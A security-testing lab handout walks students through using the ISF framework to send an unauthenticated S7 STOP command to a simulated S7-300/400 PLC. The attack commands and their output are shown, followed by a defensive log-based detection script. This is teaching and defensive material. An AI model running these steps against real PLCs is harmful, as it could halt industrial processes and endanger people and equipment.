Industrial Internet Security Testing Techniques: Application Testing (.docx)
System 2: Application Test Lab Document

Lab principle
The lab uses the ISF ICS exploitation framework and its s7_300_400_plc_control module to exploit the S7 protocol weakness and run the S7-300/400 PLC start/stop script. ISF (Industrial Exploitation Framework) is a Python-based ICS exploitation framework in the style of Metasploit; its Exploit modules cover vulnerabilities in several widely used ICS protocols.

Lab objective
Use the ISF framework to exploit the S7 protocol weakness so that the S7-300/400 PLC application software stops automatically.

Lab environment
(1) Attacker: Kali Linux virtual machine (provided with the environment)
(2) Target: Windows 10 (provided with the environment)
Recommended duration: 2 class periods

Lab steps

Step 1: Start and configure the serverdemo application
(1) On the Windows 10 host, open the serverdemo industrial software, as shown in Figure 1.
    Figure 1: serverdemo (the "S7 ICS simulator" folder, containing 1.md, clientdemo.exe, PartnerDemo.exe, serverdemo.exe and snap7.dll)
(2) The serverdemo window opens, as shown in Figure 2.
    Figure 2: serverdemo interface (Snap7 Server Demo - Windows platform 32 bit Lazarus; Log Mask event list, DB 1 / DB 2 / DB 3 tabs, Stopped, Clients: 0)
(3) Look up the IP address of the Windows 10 host by entering the following command in a command prompt window:
    ipconfig
The result is shown in Figure 3.
    Figure 3: querying the IP address (ipconfig output; the WLAN adapter has IPv4 address 10.133.148.102, subnet mask 255.255.128.0 and default gateway 10.133.255.254)
(4) With serverdemo open, configure it by setting the Local Address to the IP address of the Windows 10 host, as shown in Figure 4.
    Figure 4: configuring the IP address (Local Address set to 10.133.148.102)
(5) After the IP address is configured, click the Start button. The log shows "Server started", meaning the service is running, as shown in Figure 5.
    2021-12-09 19:55:04  Server started
    Figure 5: server started (Running, Clients: 0)

Step 2: Start and configure the clientdemo application
(1) On the Windows 10 host, open the clientdemo industrial software, as shown in Figure 6.
    Figure 6: clientdemo (clientdemo.exe in the same folder)
(2) In the clientdemo window, configure the IP address to the Windows 10 host address 10.133.148.102, as shown in Figure 7.
    Figure 7: configuring the IP address (Snap7 Client Demo - Windows platform 32 bit Lazarus; Connect as PG, Rack/Slot and TSAP fields, System Info tab showing INFO NOT AVAILABLE before the connection is made)
(3) After the IP address is configured, click the Connect button to connect to the serverdemo service, as shown in Figures 8 and 9.
    Figure 8 / Figure 9: connecting to the service (clientdemo window after Connect)
(4) Once the connection to serverdemo succeeds, the serverdemo application shows the new client in its log, as shown in Figure 10:
    2021-12-09 19:57:39  10.133.148.102  Client added
    2021-12-09 19:57:39  10.133.148.102  The client requires a PDU size of 480 bytes
    2021-12-09 19:57:39  10.133.148.102  Read SZL request, ID:0x0011 INDEX:0x0000 > OK
    2021-12-09 19:57:39  10.133.148.102  Read SZL request, ID:0x001c INDEX:0x0000 > OK
    2021-12-09 19:57:39  10.133.148.102  Read SZL request, ID:0x0131 INDEX:0x0001 > OK
    Running Clients: 1
    Figure 10: connection established

Step 3: Use the ISF framework to exploit the vulnerability and stop the serverdemo service
(1) Download the ISF framework from https://github.com/dark-lbp/isf, enter the isf-master directory and run:
    python2.7 isf.py
The result is shown in Figure 11:
    ICS Exploitation Framework
    Note     : ICSSPOLIT is fork from routersploit at https://github.com/reverse-shell/routersploit
    Dev Team : wenzhe zhu(dark-lbp)
    Exploits: 8  Scanners: 6  Creds: 14
    ICS Exploits:  PLC: 7  ICS Switch: 0  Software: 0
    Figure 11: ISF started
(2) Select the s7_300_400_plc_control module in ISF and list its options with the following commands:
    use exploits/plcs/siemens/s7_300_400_plc_control
    show options
The result is shown in Figure 12:
    isf > show options
    You have to activate any module with 'use' command.
    isf > use exploits/plcs/siemens/s7_300_400_plc_control
    Target options:
      Name      Current settings   Description
      target
      port      102                Target Port
    Module options:
      Name      Current settings   Description
      slot                         CPU slot number.
      command                      Command 1:start plc, 2:stop plc.
    Figure 12: show options
(3) Set the target, i.e. the IP address to attack, then enter the run command to launch the attack. Enter the following commands:
    set target 10.133.148.102
    run
The result is shown in Figure 13:
    [*] Running module...
    [+] Target is alive
    [*] Sending packet to target
    [*] Stop plc
    Figure 13: parameters configured and module run
(4) After the attack is started from Kali Linux, the serverdemo service on the Windows 10 host can be seen to have stopped, as shown in Figure 14. The server log records the control request:
    2021-12-09 19:59:53  10.133.148.102  Client added
    2021-12-09 19:59:53  10.133.148.102  The client requires a PDU size of 480 bytes
    2021-12-09 19:59:53  10.133.148.102  CPU Control request: STOP > OK
    2021-12-09 19:59:53  10.133.148.102  Client disconnected by peer
    Figure 14: attack succeeded (server status shows Stop)
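The server log in Figure 14 is the only place where the STOP request leaves a trace on the target, because the S7 control request itself carries no authentication. As an added example (not part of the lab document or of ISF/Snap7), the following Python script parses Snap7 Server Demo log lines of the shape shown in Figures 10 and 14 and raises an alert for every CPU control request, with a higher severity when the client is not on an engineering-workstation allowlist. The sample log lines, the allowlist and the second client address 10.0.0.99 are constructed for the example; the regular expressions are an assumption about the demo's log format, derived from the lines visible in the figures.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional, Set

# Assumed log line shape of the Snap7 Server Demo (lab figures 10 and 14):
#   "<date> <time> <client ip> <message>"
# Server-level events such as "Server started" carry no client address.
LOG_LINE = re.compile(
    r"^(?P<date>\d{4}-\d{2}-\d{2}) (?P<time>\d{2}:\d{2}:\d{2})\s+"
    r"(?:(?P<client>\d{1,3}(?:\.\d{1,3}){3})\s+)?(?P<msg>.*)$"
)

# CPU control requests as the server logs them, e.g. "CPU Control request: STOP > OK".
CONTROL_MSG = re.compile(
    r"^CPU Control request:\s*(?P<op>[A-Z][A-Z ]*?)\s*>\s*(?P<result>\w+)$"
)


@dataclass
class Event:
    date: str
    time: str
    client: Optional[str]
    msg: str


@dataclass
class Alert:
    severity: str
    client: Optional[str]
    when: str
    reason: str


def parse_line(line: str) -> Optional[Event]:
    """Parse one server log line; lines outside the format yield None."""
    m = LOG_LINE.match(line.strip())
    if m is None:
        return None
    return Event(m["date"], m["time"], m["client"], m["msg"].strip())


def detect_control_requests(lines: Iterable[str], allowed_hosts: Set[str]) -> List[Alert]:
    """Return one Alert per CPU control request found in the log.

    S7comm cannot tell an engineer from an intruder, so a control request
    from a host outside the allowlist is 'high'; a STOP from an allowed host
    is still reported as 'medium' so that every outage is visible.
    """
    alerts: List[Alert] = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        cm = CONTROL_MSG.match(ev.msg)
        if cm is None:
            continue
        op, result = cm["op"], cm["result"]
        when = f"{ev.date} {ev.time}"
        if ev.client not in allowed_hosts:
            alerts.append(Alert("high", ev.client, when,
                                f"CPU {op} from non-allowlisted host (server replied {result})"))
        elif op == "STOP":
            alerts.append(Alert("medium", ev.client, when,
                                f"CPU STOP from allowlisted host (server replied {result})"))
    return alerts


# Constructed sample log modelled on figure 14. 10.133.148.102 is the lab's
# Windows 10 host; 10.0.0.99 is a made-up client that is not allowlisted.
SAMPLE_LOG = [
    "2021-12-09 19:55:04 Server started",
    "2021-12-09 19:57:39 10.133.148.102 Client added",
    "2021-12-09 19:57:39 10.133.148.102 The client requires a PDU size of 480 bytes",
    "2021-12-09 19:57:39 10.133.148.102 Read SZL request, ID:0x0011 INDEX:0x0000 > OK",
    "2021-12-09 19:59:53 10.0.0.99 Client added",
    "2021-12-09 19:59:53 10.0.0.99 The client requires a PDU size of 480 bytes",
    "2021-12-09 19:59:53 10.0.0.99 CPU Control request: STOP > OK",
    "2021-12-09 19:59:53 10.0.0.99 Client disconnected by peer",
    "2021-12-09 20:03:10 10.133.148.102 CPU Control request: STOP > OK",
    "this line is not in the log format and is ignored",
]

# Assumed allowlist: only the lab's engineering workstation may control the CPU.
ALLOWED_HOSTS = {"10.133.148.102"}


if __name__ == "__main__":
    for a in detect_control_requests(SAMPLE_LOG, ALLOWED_HOSTS):
        print(f"[{a.severity}] {a.when} {a.client}: {a.reason}")
```

Run against the sample log, the script reports the STOP from 10.0.0.99 as high and the STOP from the allowlisted host as medium, while Read SZL and connection events produce no alert. In a real deployment the same rule would be applied to the PLC's diagnostic buffer or to network monitoring of TCP/102, since a production CPU does not write a Snap7-style log.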